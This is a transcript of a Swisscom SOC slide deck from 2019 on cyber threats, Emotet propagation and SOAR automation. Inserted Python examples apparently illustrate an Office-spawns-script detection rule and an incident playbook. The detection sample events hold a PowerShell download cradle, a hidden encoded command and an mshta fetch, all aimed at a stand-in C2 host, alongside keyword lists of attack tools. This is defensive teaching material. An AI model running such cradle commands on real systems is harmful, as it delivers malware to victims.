TRANSCRIPT
![Page 1](https://reader034.vdocument.in/reader034/viewer/2022050208/5f5b68ce778fcb304a198a82/html5/thumbnails/1.jpg)
Security Operation Center against today's cyber threats
Swisscom Dialog Arena 2019
![Page 2](https://reader034.vdocument.in/reader034/viewer/2022050208/5f5b68ce778fcb304a198a82/html5/thumbnails/2.jpg)
2
In the 1980s, access was locked like this…
![Page 3](https://reader034.vdocument.in/reader034/viewer/2022050208/5f5b68ce778fcb304a198a82/html5/thumbnails/3.jpg)
Webinar Cyber Swisscom Security Report 2019, C1 Public
3
Incidents from all over the world …
![Page 4](https://reader034.vdocument.in/reader034/viewer/2022050208/5f5b68ce778fcb304a198a82/html5/thumbnails/4.jpg)
Security Operation Center in action against current cyber threats
4
… but also in Ticino
https://www.tio.ch/ticino/cronaca/1393766/taiana-ostaggio-di-cyber-criminali-un-riscatto-da-300mila-franchi
![Page 5](https://reader034.vdocument.in/reader034/viewer/2022050208/5f5b68ce778fcb304a198a82/html5/thumbnails/5.jpg)
The threat is real. Every month Swisscom…
• 20 security incidents handled by the Swisscom CSIRT
• 2'200 private customers contacted because of hacker attacks on their accounts
• 3'000 phishing attacks recognised and blocked
• 3'009'000 attack attempts against Swisscom's infrastructure blocked
5
![Page 6](https://reader034.vdocument.in/reader034/viewer/2022050208/5f5b68ce778fcb304a198a82/html5/thumbnails/6.jpg)
• The threat situation remains complex and stable
• Attackers take advantage of the growing value of assets → targeted attacks
• The convergence of the physical and virtual worlds introduces new attack vectors
6
Threat Radar 2019
Duilio Hochstrasser, 28th March, Security Booster Training, C2 Internal
Radar entries (rings labelled Today / Trend): 3D-Printing, Workplace Diversity, Insider Threat, Device Theft, Drones & Robots, Infrastructure Misconfiguration, Decentralised Development, SCADA, IoT Devices, Security job market, IoT-Based DDoS, Digitalisation, Subscriber Compromise, AI/Analytics, Political Influence, Digital Identity, Destabilising / Centralisation, Automatisation & Scaling, All IP, Increased Complexity, Quantum Computing, Ransomware, Targeted Attacks (APT), 5G Security, Infrastructure Integrity
![Page 7](https://reader034.vdocument.in/reader034/viewer/2022050208/5f5b68ce778fcb304a198a82/html5/thumbnails/7.jpg)
Threat Radar 2019 (highlighted entries: Decentralised Development, Security job market, AI/Analytics, Increased Complexity, Targeted Attacks (APT), Ransomware)
• Security job market: significant difficulty in recruiting talent
• Targeted Attacks: targeted and complex → specific objectives
• Ransomware: encryption of critical data → ransom demand to recover the data
• Increased Complexity: the complexity of architectures keeps growing
• AI/Analytics: ever more data that can be used to influence a person's behaviour
• Decentralised Development: new DevOps development methods
7
![Page 8](https://reader034.vdocument.in/reader034/viewer/2022050208/5f5b68ce778fcb304a198a82/html5/thumbnails/8.jpg)
8
Cyber threat overview
Key factors
• Attack surface → Digitalisation
• Attack methodologies → Sophistication
• Structure of the criminal actors → Professionalisation
• Cybercrime market → Industrialisation
![Page 9](https://reader034.vdocument.in/reader034/viewer/2022050208/5f5b68ce778fcb304a198a82/html5/thumbnails/9.jpg)
9
>99% of the threats observed in the first half of 2019 require user action to succeed
Source: Proofpoint
![Page 10](https://reader034.vdocument.in/reader034/viewer/2022050208/5f5b68ce778fcb304a198a82/html5/thumbnails/10.jpg)
10
Security Operation Center in a hybrid architecture
Diagram: the Security Operation Center at the centre, connected to On-Prem, Private Clouds, Public Clouds, Managed Endpoints and BYOD
![Page 11](https://reader034.vdocument.in/reader034/viewer/2022050208/5f5b68ce778fcb304a198a82/html5/thumbnails/11.jpg)
11
Thank You!
![Page 12](https://reader034.vdocument.in/reader034/viewer/2022050208/5f5b68ce778fcb304a198a82/html5/thumbnails/12.jpg)
12
How a malware infection propagates (Emotet)
Infection phase: MALSPAM with attached documents → malicious macros or scripts → the macro/script downloads Emotet
Persistence phase: establish persistence; credential enumerator module (NetPass.exe, Web Browser PassView, Mail Clients PassView, Outlook Scraper module)
C2 phase: connects to the C2 for further instructions; downloads follow-up malware
Network propagation phase: spreads over SMB; downloads additional malware (Trickbot, Ryuk)
![Page 13](https://reader034.vdocument.in/reader034/viewer/2022050208/5f5b68ce778fcb304a198a82/html5/thumbnails/13.jpg)
13
Detection use case: detecting abnormal behaviour generated by MS Office documents
Swisscom Managed Workplaces, time range: January 2019 – August 2019
Monitored endpoints (workplaces): ~70'000
Chart, Action (Allowed / Blocked): 74% / 26%; 847
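The Emotet chain on the previous slide starts with an Office document whose macro launches a script interpreter, and the detection use case above is built around exactly that behaviour. The following Python is an added example written for this transcript, not Swisscom's own detection content or tooling: it runs an "Office application spawns a scripting or LOLBin child" rule over a handful of constructed Sysmon-style process-creation events (field names follow Sysmon Event ID 1; the `Action` field standing in for the endpoint agent's Allowed/Blocked verdict is an assumption), decodes a PowerShell `-EncodedCommand` payload so the download cradle inside it is visible to the rule, grades each hit, and produces the Allowed/Blocked split the slide reports.

```python
"""Office-spawns-script detection over Sysmon-style process-creation events.

Added example for this transcript, not Swisscom's own detection logic. Field
names (ParentImage, Image, CommandLine, User, Computer) follow Sysmon Event ID 1;
the "Action" field (Allowed/Blocked) is an assumed addition standing in for the
endpoint agent's verdict. The sample events below are constructed.
"""
import base64
import re
from collections import Counter

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_CHILDREN = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe",
                   "cmd.exe", "mshta.exe", "rundll32.exe", "regsvr32.exe",
                   "certutil.exe", "bitsadmin.exe"}
# Command-line traits typical of macro droppers: download cradles, hidden or
# policy-bypassing PowerShell, and Base64 -EncodedCommand payloads.
CRADLE_RE = re.compile(r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|"
                       r"\bwget\b|\bcurl\b|bitstransfer|urldownloadtofile", re.I)
HIDDEN_RE = re.compile(r"-w(indowstyle)?\s+hidden|-nop\b|-noni\b|-ep\s+bypass", re.I)
ENCODED_RE = re.compile(r"-e(nc(odedcommand)?)?\s+([A-Za-z0-9+/=]{40,})", re.I)

def _basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload (Base64 of UTF-16LE) or None."""
    m = ENCODED_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(3)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

def analyse_event(ev):
    """Score one event; returns a detection dict, or None if it is not Office -> script."""
    parent, child = _basename(ev["ParentImage"]), _basename(ev["Image"])
    if parent not in OFFICE_PARENTS or child not in SCRIPT_CHILDREN:
        return None
    cmd = ev.get("CommandLine", "")
    decoded = decode_encoded_command(cmd)
    text = cmd if decoded is None else cmd + " " + decoded   # inspect the payload too
    reasons = ["office_spawns_" + child.rsplit(".", 1)[0]]
    if HIDDEN_RE.search(text):
        reasons.append("hidden_or_bypass_flags")
    if decoded is not None:
        reasons.append("encoded_command")
    if CRADLE_RE.search(text):
        reasons.append("download_cradle")
    return {"host": ev["Computer"], "user": ev["User"], "parent": parent, "child": child,
            "severity": "high" if len(reasons) >= 3 else "medium",
            "reasons": reasons, "action": ev.get("Action", "unknown")}

def run_detection(events):
    return [d for d in map(analyse_event, events) if d is not None]

def action_split(detections):
    """Allowed/Blocked breakdown of the detections, the figure the slide reports."""
    return dict(Counter(d["action"] for d in detections))

# Constructed sample: a macro dropper built the way the Emotet slide describes.
PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://c2.example.invalid/e')"
ENCODED = base64.b64encode(PAYLOAD.encode("utf-16-le")).decode()
SAMPLE_EVENTS = [
    {"Computer": "ws-0417", "User": "CORP\\alice", "Action": "Blocked",
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -nop -w hidden -enc " + ENCODED},
    {"Computer": "ws-0912", "User": "CORP\\bob", "Action": "Allowed",
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'cmd.exe /c "C:\Users\bob\AppData\Local\Temp\inv.vbs"'},
    {"Computer": "ws-0103", "User": "CORP\\carol", "Action": "Blocked",
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE",
     "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "mshta.exe http://c2.example.invalid/update.hta"},
    {"Computer": "ws-0417", "User": "CORP\\alice", "Action": "Allowed",   # benign print helper
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\splwow64.exe", "CommandLine": "splwow64.exe 12288"},
    {"Computer": "srv-02", "User": "CORP\\dave", "Action": "Allowed",     # not Office-spawned
     "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe Get-Service"},
]

if __name__ == "__main__":
    hits = run_detection(SAMPLE_EVENTS)
    for h in hits:
        print(h["severity"], h["host"], h["parent"], "->", h["child"], h["reasons"], h["action"])
    print(action_split(hits))
```

The parent/child pair alone is enough to raise an alert (the Excel → cmd.exe case is medium even with an innocuous-looking command line); the encoded-command decoding is what turns the first event into a high-severity hit, because the download cradle is invisible in the raw command line. Tuning the two allowlists against your own fleet is where the 74%/26% split comes from: benign children such as the print-spooler helper must not fire, or the analysts drown in the alerts the "SOC challenges" slide warns about.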
![Page 14](https://reader034.vdocument.in/reader034/viewer/2022050208/5f5b68ce778fcb304a198a82/html5/thumbnails/14.jpg)
14
Security Operation Center
![Page 15](https://reader034.vdocument.in/reader034/viewer/2022050208/5f5b68ce778fcb304a198a82/html5/thumbnails/15.jpg)
15
Alerts → Analysis → Response → Prevention
From data to response
![Page 16](https://reader034.vdocument.in/reader034/viewer/2022050208/5f5b68ce778fcb304a198a82/html5/thumbnails/16.jpg)
16
Security Operation Center in a hybrid architecture
Diagram: the Security Operation Center at the centre, connected to On-Prem, Private Clouds, Public Clouds, Managed Endpoints and BYOD
![Page 17](https://reader034.vdocument.in/reader034/viewer/2022050208/5f5b68ce778fcb304a198a82/html5/thumbnails/17.jpg)
17
Incident Playbooks
Security Alert → Analyse → False-Positive?
• YES → Close
• NO → Containment: Block / Quarantine, Ticket CSIRT
![Page 18](https://reader034.vdocument.in/reader034/viewer/2022050208/5f5b68ce778fcb304a198a82/html5/thumbnails/18.jpg)
19
SOC: current challenges
• Constant increase in alerts
• Shortage of trained staff
• Heterogeneous infrastructures
![Page 19](https://reader034.vdocument.in/reader034/viewer/2022050208/5f5b68ce778fcb304a198a82/html5/thumbnails/19.jpg)
20
Automation
![Page 20](https://reader034.vdocument.in/reader034/viewer/2022050208/5f5b68ce778fcb304a198a82/html5/thumbnails/20.jpg)
21
SOAR technology overview: Security Orchestration, Automation and Response
Orchestration
• Playbooks, workflows
• Logically organised plan of actions
• Activate and coordinate the security product stack from a central location
Response
• Case management
• Analysis & reporting
• Communication & collaboration
Automation
• Automated scripts
• Extensible integration network
• Machine execution of playbook tasks
![Page 21](https://reader034.vdocument.in/reader034/viewer/2022050208/5f5b68ce778fcb304a198a82/html5/thumbnails/21.jpg)
22
Automation: opportunities and risks
Opportunities
• Reduced time to act
• Relief for analysts
• Better detection quality
• More efficient response activities
Risks
• Complex workflows
• Maintenance effort
• High level of automation
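The playbook flow on the "Incident Playbooks" slide and the SOAR "machine execution of playbook tasks" above are easiest to reason about as code, and the risks just listed (complex workflows, maintenance effort, a high level of automation) are where such code usually goes wrong. The following Python is an added example written for this transcript, not Swisscom's presentation material or any SOAR product's API: it implements Security Alert → Analyse → False-Positive? → Close / Containment (Block / Quarantine, CSIRT ticket) and adds two guardrails a practitioner wants before letting a machine run it: a human-approval gate for high-impact assets, and idempotent, logged actions so a retried or edited workflow cannot apply containment twice. The connector names (`block_indicator`, `quarantine_host`, `open_csirt_ticket`), the asset classes and the allowlist are assumptions; the connectors only record what they would do.

```python
"""Incident playbook runner with guardrails against automation risk.

Added example, not Swisscom's presentation material or tooling. Encodes the
flow Security Alert -> Analyse -> False-Positive? -> Close, otherwise
Containment (Block / Quarantine + CSIRT ticket), with two guardrails:
a human-approval gate for high-impact assets and idempotent, logged actions.
Connector names, asset classes and the allowlist are assumptions; connectors
only record what they would do.
"""
from dataclasses import dataclass, field
from typing import List, Optional, Tuple


@dataclass
class Alert:
    alert_id: str
    host: str
    indicator: str      # e.g. the C2 domain or file hash the detection fired on
    severity: str       # "low" | "medium" | "high"
    asset_class: str    # "workstation" | "server" | "domain_controller"


@dataclass
class PlaybookRun:
    alert_id: str
    status: str = "open"   # open | closed_false_positive | awaiting_approval | contained
    actions: List[Tuple[str, str]] = field(default_factory=list)   # doubles as audit trail
    ticket: Optional[str] = None


KNOWN_BENIGN = {"update.microsoft.invalid", "intranet.corp.invalid"}   # constructed allowlist
REQUIRE_APPROVAL = {"server", "domain_controller"}   # never auto-quarantine these


def analyse(alert: Alert) -> bool:
    """Analysis step: enrichment against the allowlist answers 'False-Positive?'."""
    return alert.indicator in KNOWN_BENIGN


def _record(run: PlaybookRun, action: Tuple[str, str]) -> None:
    # Idempotent: re-running a playbook (after an edit, a crash or a retry) must not
    # block or quarantine twice; the same log is what the analyst reviews afterwards.
    if action not in run.actions:
        run.actions.append(action)


def block_indicator(run: PlaybookRun, indicator: str) -> None:   # low blast radius: automated
    _record(run, ("block", indicator))


def quarantine_host(run: PlaybookRun, host: str) -> None:        # high blast radius: gated
    _record(run, ("quarantine", host))


def open_csirt_ticket(run: PlaybookRun, alert: Alert) -> None:
    run.ticket = f"CSIRT-{alert.alert_id}"
    _record(run, ("ticket", run.ticket))


def run_playbook(alert: Alert, approved: bool = False) -> PlaybookRun:
    """Security Alert -> Analyse -> False-Positive? -> Close | Containment."""
    run = PlaybookRun(alert_id=alert.alert_id)
    if analyse(alert):                              # YES branch: close, no containment
        _record(run, ("close", "false_positive"))
        run.status = "closed_false_positive"
        return run
    block_indicator(run, alert.indicator)           # NO branch: containment starts
    open_csirt_ticket(run, alert)                   # the CSIRT always gets the case
    if alert.asset_class in REQUIRE_APPROVAL and not approved:
        run.status = "awaiting_approval"            # guardrail: a human decides on quarantine
        return run
    quarantine_host(run, alert.host)
    run.status = "contained"
    return run


if __name__ == "__main__":
    for a in (Alert("A1", "ws-0417", "update.microsoft.invalid", "medium", "workstation"),
              Alert("A2", "ws-0912", "c2.example.invalid", "high", "workstation"),
              Alert("A3", "dc-01", "c2.example.invalid", "high", "domain_controller")):
        r = run_playbook(a)
        print(a.alert_id, r.status, r.actions)
```

The level of automation is set per action rather than per playbook: blocking an indicator at the proxy or firewall is cheap to reverse and always runs, while quarantining a domain controller is the kind of step that a fully automated workflow turns into an outage, so the run parks in `awaiting_approval` with the ticket already open and resumes only when an analyst re-runs it with `approved=True`.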
![Page 22](https://reader034.vdocument.in/reader034/viewer/2022050208/5f5b68ce778fcb304a198a82/html5/thumbnails/22.jpg)
23
Applying the lessons learned
Detection → Response → Prevention (cycle)
![Page 23](https://reader034.vdocument.in/reader034/viewer/2022050208/5f5b68ce778fcb304a198a82/html5/thumbnails/23.jpg)
24
Key Messages
• Do the basics
• Training / Education / Resources
• Automation / Orchestration
• Anticipation: "Keep an eye on the threat landscape"
![Page 24](https://reader034.vdocument.in/reader034/viewer/2022050208/5f5b68ce778fcb304a198a82/html5/thumbnails/24.jpg)
Swisscom Cyber Security Report:
https://www.swisscom.ch/it/business/enterprise/downloads/security/report-bedrohungslage-schweiz-2019.html
Useful documents on "Cyber Security":
https://www.swisscom.ch/en/business/enterprise/downloads/security.html
26
Miscellaneous information